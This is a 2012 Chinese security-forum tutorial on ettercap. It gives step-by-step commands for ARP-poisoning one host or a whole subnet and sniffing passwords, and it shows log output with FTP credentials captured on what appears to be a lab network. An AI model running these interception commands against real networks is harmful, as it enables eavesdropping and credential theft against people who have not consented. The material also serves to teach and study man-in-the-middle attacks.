切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
42 中间人攻击 ettercap 嗅探密码[复制链接]
发表于 2012-8-14 17:39:15 | 显示全部楼层 |!read_mode!
简单介绍ettercap : 地球上最强大的ARP工具
在前面安装SET的时候。我们已经安装过了他。先围观他:
/usr/sbin/ettercap  执行文件
配置文件:
  1. root@Dis9Team:~# cd /usr/share/ettercap/
  2. root@Dis9Team:/usr/share/ettercap# ls
  3. ettercap.png  etter.filter           etter.filter.kill  etter.finger.mac  etter.mime
  4. etter.dns     etterfilter.cnt        etter.filter.ssh   etter.finger.os   etter.services
  5. etter.fields  etter.filter.examples  etterfilter.tbl    etterlog.dtd      etter.ssl.crt
  6. root@Dis9Team:/usr/share/ettercap#
复制代码
查看帮助
  1. root@Dis9Team:/usr/share/ettercap# ettercap -h

  2. ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA


  3. Usage: ettercap [OPTIONS] [TARGET1] [TARGET2]

  4. TARGET is in the format MAC/IPs/PORTs (see the man for further detail)

  5. Sniffing and Attack options:
  6.   -M, --mitm     perform a mitm attack
  7.   -o, --only-mitm             don't sniff, only perform the mitm attack
  8.   -B, --bridge         use bridged sniff (needs 2 ifaces)
  9.   -p, --nopromisc             do not put the iface in promisc mode
  10.   -u, --unoffensive           do not forward packets
  11.   -r, --read            read data from pcapfile
  12.   -f, --pcapfilter    set the pcap filter
  13.   -R, --reversed              use reversed TARGET matching
  14.   -t, --proto          sniff only this proto (default is all)

  15. User Interface Type:
  16.   -T, --text                  use text only GUI
  17.        -q, --quiet                 do not display packet contents
  18.        -s, --script           issue these commands to the GUI
  19.   -C, --curses                use curses GUI
  20.   -G, --gtk                   use GTK+ GUI
  21.   -D, --daemon                daemonize ettercap (no GUI)

  22. Logging options:
  23.   -w, --write           write sniffed data to pcapfile
  24.   -L, --log          log all the traffic to this
  25.   -l, --log-info     log only passive infos to this
  26.   -m, --log-msg      log all the messages to this
  27.   -c, --compress              use gzip compression on log files

  28. Visualization options:
  29.   -d, --dns                   resolves ip addresses into hostnames
  30.   -V, --visual        set the visualization format
  31.   -e, --regex          visualize only packets matching this regex
  32.   -E, --ext-headers           print extended header for every pck
  33.   -Q, --superquiet            do not display user and password

  34. General options:
  35.   -i, --iface          use this network interface
  36.   -I, --iflist                show all the network interfaces
  37.   -n, --netmask      force this  on iface
  38.   -P, --plugin        launch this
  39.   -F, --filter          load the filter  (content filter)
  40.   -z, --silent                do not perform the initial ARP scan
  41.   -j, --load-hosts      load the hosts list from
  42.   -k, --save-hosts      save the hosts list to
  43.   -W, --wep-key         use this wep key to decrypt wifi packets
  44.   -a, --config        use the alterative config file

  45. Standard options:
  46.   -U, --update                updates the databases from ettercap website
  47.   -v, --version               prints the version and exit
  48.   -h, --help                  this help screen


  49. root@Dis9Team:/usr/share/ettercap#
复制代码

嗅探密码:
指定IP嗅探:ettercap -T -M arp /目标/ -q -i 网卡

  1. root@Dis9Team:/usr/share/ettercap# ettercap -T -M arp /192.168.40.129/ -q -i eth0

  2. ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

  3. Listening on eth0... (Ethernet)

  4.   eth0 ->        00:0C:29:84:4C:9D    192.168.40.128     255.255.255.0

  5. SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
  6. Privileges dropped to UID 65534 GID 65534...

  7.   28 plugins
  8.   39 protocol dissectors
  9.   53 ports monitored
  10. 7587 mac vendor fingerprint
  11. 1698 tcp OS fingerprint
  12. 2183 known services

  13. Scanning for merged targets (1 hosts)...

  14. * |==================================================>| 100.00 %

  15. 1 hosts added to the hosts list...

  16. ARP poisoning victims:

  17. GROUP 1 : 192.168.40.129 00:0C:29:EB:F8:94

  18. GROUP 2 : ANY (all the hosts in the list)
  19. Starting Unified sniffing...


  20. Text only Interface activated...
  21. Hit 'h' for inline help

  22. FTP : 199.71.212.202:21 -> USER: test  PASS: test
复制代码

嗅探当前全部网段:
ettercap -T -M arp // // -q -i 网卡
  1. root@Dis9Team:/usr/share/ettercap# ettercap -T -M arp // // -q -i eth0
复制代码

保存结果:  -L 文件名字
  1. root@Dis9Team:/# ettercap -T -M arp // // -q -i eth0 -L test
复制代码

这样多了两个文件:test.eci和test.ecp ,用cat是不能看看的 需要:etterlog

  1. root@Dis9Team:/# etterlog test.ecp

  2. etterlog NG-0.7.3 copyright 2001-2004 ALoR & NaGA

  3. Log file version    : NG-0.7.3
  4. Timestamp           : Sun Jun  3 08:51:00 2012
  5. Type                : LOG_PACKET



  6. Sun Jun  3 08:51:23 2012 [1832]
  7. UDP  192.168.40.128:68 --> 192.168.40.254:67 |

  8. ....$l........(...............).L...........................................................................................................................................................................................................c.Sc5....Dis9Team7.......w.,/.y*y..*............................

  9. Sun Jun  3 08:51:23 2012 [2171]
  10. UDP  192.168.40.254:67 --> 192.168.40.128:68 |

  11. ....$l........(...(...(.......).L...........................................................................................................................................................................................................c.Sc5..6...(.3...............(.....(...localdomain....(.,...(...

  12. Sun Jun  3 08:51:25 2012 [664787]
  13. UDP  192.168.40.129:138 --> 192.168.40.255:138 |

  14. ......(....... ECFCELCNDBDFECDBECEFDFEDDIDHECCA. FHEPFCELEHFCEPFFFACACACACACACABO..SMB%..............................!...................!.V.........2.\MAILSLOT\BROWSE.......BRK-15B1BE5C87B.........U..

  15. Sun Jun  3 08:51:27 2012 [551268]
  16. UDP  192.168.40.129:1030 --> 192.168.40.2:53 |

  17. SR...........brk.dis9.com.....

  18. Sun Jun  3 08:51:27 2012 [585358]
  19. UDP  192.168.40.2:53 --> 192.168.40.129:1030 |

  20. SR...........brk.dis9.com..................G...............emma.ns
  21. cloudflare...............alex.?.[............;d.:............:p

  22. Sun Jun  3 08:51:27 2012 [587412]
  23. TCP  192.168.40.129:1033 --> 199.71.212.202:21 | S



  24. Sun Jun  3 08:51:27 2012 [913069]
  25. TCP  199.71.212.202:21 --> 192.168.40.129:1033 | SA



  26. Sun Jun  3 08:51:27 2012 [913844]
  27. TCP  192.168.40.129:1033 --> 199.71.212.202:21 | A



  28. Sun Jun  3 08:51:28 2012 [237213]
  29. TCP  199.71.212.202:21 --> 192.168.40.129:1033 | AP

  30. 220---------- ........ Pure-FTPd [privsep] ----------.
  31. 220-...... 1 .................. 50 .......
  32. 220-.............. 23:51.............. 21...
  33. 220-............ - ...............
  34. 220-..............IPv6.......
  35. 220 .. 15 .............................


  36. Sun Jun  3 08:51:28 2012 [336812]
  37. TCP  199.71.212.202:21 --> 192.168.40.129:1033 | AP

  38. 220---------- ........ Pure-FTPd [privsep] ----------.
  39. 220-...... 1 .................. 50 .......
  40. 220-.............. 23:51.............. 21...
  41. 220-............ - ...............
  42. 220-..............IPv6.......
  43. 220 .. 15 .............................


  44. Sun Jun  3 08:51:28 2012 [337209]
  45. TCP  192.168.40.129:1033 --> 199.71.212.202:21 | A



  46. Sun Jun  3 08:51:29 2012 [94498]
  47. TCP  192.168.40.129:1033 --> 199.71.212.202:21 | AP

  48. USER test.


  49. Sun Jun  3 08:51:29 2012 [94958]
  50. TCP  199.71.212.202:21 --> 192.168.40.129:1033 | A



  51. Sun Jun  3 08:51:29 2012 [420673]
  52. TCP  199.71.212.202:21 --> 192.168.40.129:1033 | AP

  53. 331 ...... test OK. ..........


  54. Sun Jun  3 08:51:29 2012 [520424]
  55. TCP  199.71.212.202:21 --> 192.168.40.129:1033 | AP

  56. 331 ...... test OK. ..........


  57. Sun Jun  3 08:51:29 2012 [520844]
  58. TCP  192.168.40.129:1033 --> 199.71.212.202:21 | A



  59. Sun Jun  3 08:51:29 2012 [937422]
  60. TCP  192.168.40.129:1033 --> 199.71.212.202:21 | AP

  61. PASS f.


  62. Sun Jun  3 08:51:29 2012 [937878]
  63. TCP  199.71.212.202:21 --> 192.168.40.129:1033 | A



  64. Sun Jun  3 08:51:35 2012 [243645]
  65. TCP  199.71.212.202:21 --> 192.168.40.129:1033 | AP

  66. 530 ...............


  67. Sun Jun  3 08:51:35 2012 [344162]
  68. TCP  199.71.212.202:21 --> 192.168.40.129:1033 | AP

  69. 530 ...............


  70. Sun Jun  3 08:51:35 2012 [344469]
  71. TCP  192.168.40.129:1033 --> 199.71.212.202:21 | A



  72. Sun Jun  3 08:52:05 2012 [665372]
  73. UDP  192.168.40.129:137 --> 192.168.40.2:137 |

  74. . @......... ABACFPFPENFDECFCEPFHFDEFFPFPACAB.. ..... ............(.

  75. Sun Jun  3 08:52:07 2012 [165363]
  76. UDP  192.168.40.129:137 --> 192.168.40.2:137 |

  77. . @......... ABACFPFPENFDECFCEPFHFDEFFPFPACAB.. ..... ............(.

  78. Sun Jun  3 08:52:08 2012 [665429]
  79. UDP  192.168.40.129:137 --> 192.168.40.2:137 |

  80. . @......... ABACFPFPENFDECFCEPFHFDEFFPFPACAB.. ..... ............(.
复制代码

另外一个文件:

[code]root@Dis9Team:/# etterlog test.eci

etterlog NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Log file version    : NG-0.7.3
Timestamp           : Sun Jun  3 08:51:00 2012
Type                : LOG_INFO

1698 tcp OS fingerprint
7587 mac vendor fingerprint
2183 known services


==================================================
IP address   : 192.168.40.1

MAC address  : 00:50:56:C0:00:08
MANUFACTURER : Vmware

DISTANCE     : 1   
TYPE         : LAN host

FINGERPRINT      :
OPERATING SYSTEM : UNKNOWN


==================================================

==================================================
IP address   : 192.168.40.2

MAC address  : 00:50:56:EC:2A:D4
MANUFACTURER : Vmware

DISTANCE     : 1   
TYPE         : GATEWAY

FINGERPRINT      :
OPERATING SYSTEM : UNKNOWN

   PORT     : UDP 53 | domain         []


==================================================

==================================================
IP address   : 192.168.40.128

MAC address  : 00:0C:29:84:4C:9D
MANUFACTURER : Vmware

DISTANCE     : 0   
TYPE         : GATEWAY

FINGERPRINT      :
OPERATING SYSTEM : UNKNOWN

   PORT     : UDP 68 | dhcpclient         []


==================================================

==================================================
IP address   : 192.168.40.129

MAC address  : 00:0C:29:EB:F8:94
MANUFACTURER : Vmware

DISTANCE     : 1   
TYPE         : LAN host

FINGERPRINT      : FAF0:05B4:80:WS:1:1:1:0:S:30
OPERATING SYSTEM : Windows XP Pro, Windows 2000 Pro

   PORT     : UDP 137 | netbios-ns         []

   PORT     : UDP 138 | netbios-dgm         []


==================================================

==================================================
IP address   : 192.168.40.254

MAC address  : 00:50:56:E3:C4:75
MANUFACTURER : Vmware

DISTANCE     : 1   
TYPE         : LAN host

FINGERPRINT      :
OPERATING SYSTEM : UNKNOWN

   PORT     : UDP 67 | dhcpserver         []


==================================================

==================================================
IP address   : 199.71.212.202
Hostname     : brk.dis9.com

DISTANCE     : 1   
TYPE         : REMOTE host

FINGERPRINT      : FAF0:05B4:80:WS:0:0:0:0:A:2C
OPERATING SYSTEM : Windows NT 4.0

   PORT     : TCP 21 | ftp         [---------
操千曲而后晓声,观千剑而后识器。
发表于 2012-8-14 17:39:56 | 显示全部楼层
ACCOUNT : test / f  (192.168.40.129)



==================================================



root@Dis9Team:/# etterlog test.eci

详细的信息都有
操千曲而后晓声,观千剑而后识器。
发表于 2012-8-14 22:44:45 | 显示全部楼层
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-8-12 13:44

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部